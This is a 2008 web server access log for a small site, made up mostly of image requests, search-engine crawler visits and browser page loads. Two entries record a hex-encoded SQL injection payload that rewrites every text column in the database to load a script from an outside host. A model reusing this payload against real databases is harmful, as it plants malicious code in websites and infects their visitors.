89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_11.png HTTP/1.1" 200 233 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_12.png HTTP/1.1" 200 595 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_13.png HTTP/1.1" 200 282 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_14.png HTTP/1.1" 200 609 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_15.png HTTP/1.1" 200 524 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_16.png HTTP/1.1" 200 499 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_17.png HTTP/1.1" 200 958 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_18.png HTTP/1.1" 200 453 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_19.png HTTP/1.1" 200 277 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_20.png HTTP/1.1" 200 252 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_21.png HTTP/1.1" 200 253 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_22.png HTTP/1.1" 200 430 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_23.png HTTP/1.1" 200 454 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_24.png HTTP/1.1" 200 353 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_25.png HTTP/1.1" 200 827 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_26.png HTTP/1.1" 200 880 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_27.png HTTP/1.1" 200 854 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_28.png HTTP/1.1" 200 721 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_29.png HTTP/1.1" 200 564 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_30.png HTTP/1.1" 200 233 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_31.png HTTP/1.1" 200 402 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_32.png HTTP/1.1" 200 374 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /bmpp/Bilder/18_33.png HTTP/1.1" 200 398 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /bmpp/Bilder/18_34.png HTTP/1.1" 200 573 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /bmpp/Bilder/18_35.png HTTP/1.1" 200 691 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /bmpp/Bilder/18_36.png HTTP/1.1" 200 557 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /bmpp/Bilder/18_37.png HTTP/1.1" 200 239 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /bmpp/Bilder/18_38.png HTTP/1.1" 200 509 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /bmpp/Bilder/18_39.png HTTP/1.1" 200 733 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /bmpp/Bilder/18_40.png HTTP/1.1" 200 506 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /bmpp/Bilder/18_41.png HTTP/1.1" 200 334 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /bmpp/Bilder/18_42.png HTTP/1.1" 200 286 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /bmpp/Bilder/18_43.png HTTP/1.1" 200 280 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:12 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
64.1.215.165 - - [17/Sep/2008:15:51:25 +0200] "GET /logs/usage_200706.html HTTP/1.0" 200 107008 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
77.91.224.4 - - [17/Sep/2008:15:58:39 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
208.66.193.164 - - [17/Sep/2008:15:58:39 +0200] "GET / HTTP/1.1" 200 7869 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
74.6.17.186 - - [17/Sep/2008:16:07:16 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.186 - - [17/Sep/2008:16:07:16 +0200] "GET /framez_0.html HTTP/1.0" 200 12444 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.1.215.165 - - [17/Sep/2008:16:34:37 +0200] "GET /logs/usage_200704.html HTTP/1.0" 200 99793 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
208.96.54.71 - - [17/Sep/2008:16:40:45 +0200] "GET /framez.html HTTP/1.1" 200 3959 "-" "Mozilla/5.0 (compatible; discobot/1.0; +http://discoveryengine.com/discobot.html)"
208.96.54.71 - - [17/Sep/2008:16:41:02 +0200] "GET /framez-rez.html HTTP/1.1" 200 4323 "-" "Mozilla/5.0 (compatible; discobot/1.0; +http://discoveryengine.com/discobot.html)"
208.36.144.10 - - [17/Sep/2008:16:42:37 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.6.17.186 - - [17/Sep/2008:16:51:41 +0200] "GET /neon/large.html HTTP/1.0" 200 1547 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.186 - - [17/Sep/2008:16:57:06 +0200] "GET /neon/annniiii.html HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.43.24.86 - - [17/Sep/2008:17:18:45 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
72.43.24.86 - - [17/Sep/2008:17:18:45 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
74.6.17.186 - - [17/Sep/2008:17:20:34 +0200] "GET /restate_copy.html HTTP/1.0" 200 97631 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.86.183.131 - - [17/Sep/2008:17:28:13 +0200] "GET /?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 7869 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
202.86.183.131 - - [17/Sep/2008:17:28:13 +0200] "GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 7869 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.1.215.165 - - [17/Sep/2008:17:35:26 +0200] "GET /your_tour.html HTTP/1.0" 200 31728 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
201.137.65.111 - - [17/Sep/2008:17:51:58 +0200] "POST /cgi-bin/redir.cgi HTTP/1.1" 404 2748 "http://various-euro.com/cgi-bin/redir.cgi" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
79.101.74.224 - - [17/Sep/2008:18:02:51 +0200] "GET / HTTP/1.1" 302 353 "http://www.google.com/search?hl=en&q=zampa+di+leone&btnG=Google+Search&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
79.101.74.224 - - [17/Sep/2008:18:02:51 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.google.com/search?hl=en&q=zampa+di+leone&btnG=Google+Search&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
79.101.74.224 - - [17/Sep/2008:18:02:52 +0200] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
79.101.74.224 - - [17/Sep/2008:18:02:52 +0200] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
79.101.74.224 - - [17/Sep/2008:18:02:52 +0200] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
79.101.74.224 - - [17/Sep/2008:18:02:52 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
79.101.74.224 - - [17/Sep/2008:18:02:55 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
65.55.211.166 - - [17/Sep/2008:18:27:57 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.166 - - [17/Sep/2008:18:27:57 +0200] "GET /f-other.html HTTP/1.1" 200 33189 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
77.91.224.4 - - [17/Sep/2008:18:48:12 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
77.91.224.4 - - [17/Sep/2008:18:48:12 +0200] "GET /framez-rez.html HTTP/1.1" 200 4323 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
74.6.17.186 - - [17/Sep/2008:18:49:38 +0200] "GET /frame-menu.html HTTP/1.0" 200 10536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.1.215.165 - - [17/Sep/2008:19:23:37 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
72.54.14.114 - - [17/Sep/2008:19:35:19 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:20 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:20 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:20 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:24 +0200] "GET /framez.html HTTP/1.1" 200 3959 "http://www.various-euro.com/framez_0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:24 +0200] "GET /frame-menu.html HTTP/1.1" 200 10536 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:25 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5418 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:25 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:25 +0200] "GET /bannerz/neon_click_3.gif HTTP/1.1" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:25 +0200] "GET /eurosign3.gif HTTP/1.1" 200 7879 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:25 +0200] "GET /bannerz/neon_click_1.gif HTTP/1.1" 200 890 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:25 +0200] "GET /bannerz/neon_click_2.gif HTTP/1.1" 200 387 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:25 +0200] "GET /bannerz/douwil.gif HTTP/1.1" 200 528 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:26 +0200] "GET /bannerz/anti_black_small.gif HTTP/1.1" 200 1009 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:26 +0200] "GET /bannerz/copyleft_black_small.gif HTTP/1.1" 200 1231 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:26 +0200] "GET /bannerz/google/Logo_40blk.gif HTTP/1.1" 200 2308 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:25 +0200] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:25 +0200] "GET /bannerz/goolag_468.jpg HTTP/1.1" 200 28285 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:25 +0200] "GET /bannerz/wet.gif HTTP/1.1" 200 18561 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
72.54.14.114 - - [17/Sep/2008:19:35:25 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.2) Gecko/2008090514 Firefox/3.0.2"
64.1.215.165 - - [17/Sep/2008:19:44:27 +0200] "GET /framez-zampa-lovers.html HTTP/1.0" 200 4322 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
64.1.215.165 - - [17/Sep/2008:20:00:16 +0200] "GET /sendi_agent.html HTTP/1.0" 200 6213 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.6.17.186 - - [17/Sep/2008:20:09:31 +0200] "GET /f-rez.html HTTP/1.0" 200 9765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
